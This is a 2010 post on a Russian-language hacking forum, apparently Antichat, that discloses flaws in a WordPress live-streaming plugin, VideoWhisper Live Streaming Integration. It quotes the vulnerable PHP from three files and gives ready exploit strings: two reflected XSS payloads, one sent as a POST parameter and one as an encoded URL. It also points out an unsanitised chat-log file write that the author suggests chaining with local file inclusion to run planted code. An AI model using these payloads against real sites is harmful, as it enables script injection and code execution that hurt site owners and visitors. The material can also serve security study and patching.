24.05.2010, 02:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
VideoWhisper Live Streaming Integration
Version: 2.1 Downloads 3,814 скачать
Как бы смотрел... Все-таки напишу хоть и пасивки...
Passive XSS
plugins/videowhisper-live-streaming-integration/ls/v_status.php
PHP код:
$room=$_POST[r];
$session=$_POST[s];
$username=$_POST[u];
$message=$_POST[m];
$currentTime=$_POST[ct];
$lastTime=$_POST[lt];
$maximumSessionTime=0; //900000ms=15 minutes; 0 for unlimited
$disconnect=""; //anything else than "" will disconnect with that message
?>timeTotal=<?=$maximumSessionTime?>&timeUsed=<?=$currentTime?>&lastTime=<?=$currentTime?>&disconnect=<?=$disconnect?>&loadstatus=1
Експлуатация:
POST
ct=<script>alert(123)</script>
Passive XSS
/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php
PHP код:
/*...*/
<div class="info"><h1><?=$_GET[message]?></h1>Chat session ended: You can close this window.</div>
/*...*/
http://[host]/[path]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3Cscript%3Ealert%28123%29%3 C/script%3E
Пишем в файл. Если есть LFI то повезло.
plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php
PHP код:
<?php
$username=$_POST['u'];
$session=$_POST['s'];
$room=$_POST['r'];
$message=$_POST['msg'];
$time=$_POST['msgtime'];
//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
$dir="uploads";
if (!file_exists($dir)) mkdir($dir);
$dir.="/$room";
if (!file_exists($dir)) mkdir($dir);
$day=date("y-M-j",time());
$dfile = fopen("uploads/$room/Log$day.html","a");
fputs($dfile,$message."<BR>");
fclose($dfile);
?>loadstatus=1
Путь wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads
Последний раз редактировалось Strilo4ka; 24.05.2010 в 03:11..
|
|
|